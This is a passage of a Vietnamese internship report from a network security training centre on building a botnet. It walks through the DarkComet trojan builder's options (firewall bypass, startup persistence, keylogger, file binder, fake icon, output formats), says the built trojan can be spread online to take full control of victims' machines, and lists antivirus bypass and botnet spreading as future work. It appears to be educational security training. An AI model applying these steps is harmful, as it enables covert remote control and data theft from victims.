Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

26 Trang

Giao diện full editor:

Các cài đặt:

- Main settings

Cài đặt password, server ID, profile name và tùy chọn bypass tường lửa

- Network Settings

Cài đặt IP và cổng lắng nghe của server.

Page 27: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

27 Trang

- Module Startup

Tùy chọn trojan có khởi động cùng Windows hay không.

- Install Message

Tùy chọn có hiển thị hộp thoại thông báo khi nạn nhân chạy chương trình

trojan hay không.

Page 28: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

28 Trang

Module Shield:

Các tùy chọn giúp trojan ẩn mình.

- Keylogger

Tùy chọn ghi log bàn phím, địa chỉ tải log.

- File Binder

Tùy chọn đính kèm file khác. Với tùy chọn này, trojan có thể mang theo một hoặc nhiều file mã độc, cài đặt các file mã độc này khởi động cùng Windows.

Page 29: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

29 Trang

- Choose Icon

Tùy chọn một icon giả để đánh lừa nạn nhân.

- Stub Finalization

Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn

cách nén file trojan và lưu các cài đặt để sử dụng lại.

Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo trojan. Với trojan vừa được tạo, ta có thể phát tán lên internet. Khi một người dùng internet down trojan về và mở ra thì sẽ có kết nối về server, lúc đó dựa vào giao diện quản lí của DarkComet, ta có toàn quyền với máy của nạn nhân.

Page 30: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

30 Trang

Giao diện quản lí users:

Giao diện điều khiển user:

Page 31: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

31 Trang

VI. HƯỚNG PHÁT TRIỂN Công nghệ thông tin là ngành đang phát triển rất mạnh ở Việt Nam. Theo số liệu từ “Sách trắng Công nghệ thông tin – Truyền thông 2013”, cả nước có trên 1300 trang thông tin điện tử, 420 trang mạng xã hội được cấp phép. Đi cùng với sự phát triển này là số lượng các máy chủ (server) phục vụ các trang mạng, máy tính để bàn (PC), máy tính xách tay (laptop) cũng tăng lên rất nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây là môi trường rất thuận lợi cho sự phát triển của botnet, zombie.

Để tiếp tục phát triển và đáp ứng yêu cầu thực tế, đề tài này cần nghiêng cứu mở

rộng theo các hướng:

- Các phương pháp bypass các antivirus hiện tại

- Các loại bot phổ biến và nguy hiểm khác

- Các cách phát tán botnet

- Các cách khai thác botnet

- Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet

VII. KẾT LUẬN Với sự chỉ bảo và hướng dẫn của thầy Võ Đỗ Thắng, sự chỉ bảo nhiệt tình của các giảng viên và nhân viên của trung tâm cùng với sự nỗ lực làm việc của bản thân em, đề tài “Nghiên cứu triển khai mạng lưới zombie, botnet trên hệ thống mạng” của em đã được hoàn thành, nhưng vẫn còn một số yếu điểm.

Những nội dung chính đã đạt được:

- Cài đặt và sử dụng BackTrack 5.3 với giao diện đồ họa và giao diện dòng

lệnh.

- Sử dụng thành thạo phần mềm Metasploit khai thác các lỗi hệ điều hành, các lỗi phần mềm Microsoft Office, Internet Explorer, Adobe Reader xâm nhập thành công và toàn điều khiển từ xa máy nạn nhân

- Cài đặt thành công DarkComet trên Windows và linux

- Tạo bot bằng DarkComet với các tùy chọn

- Phát tán thành công bot, bước đầu xây dựng mạng lưới botnet

- Xâm nhập thành công và toàn quyền điều khiển máy nạn nhân thông qua DarkComet bot.

Page 32: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

32 Trang

VIII. TÀI LIỆU THAM KHẢO

1. “Tài liệu hướng dẫn và sử dụng backtrack 5 để khai thác lỗ hổng mạng tại trung tâm athena”, Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena

2. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng – Bí quyết và giải pháp”

3. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php

4. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-capital-v

5. “Sách trắng Công nghệ thông tin – Truyền thông”, 2013, Bộ CNTT - TT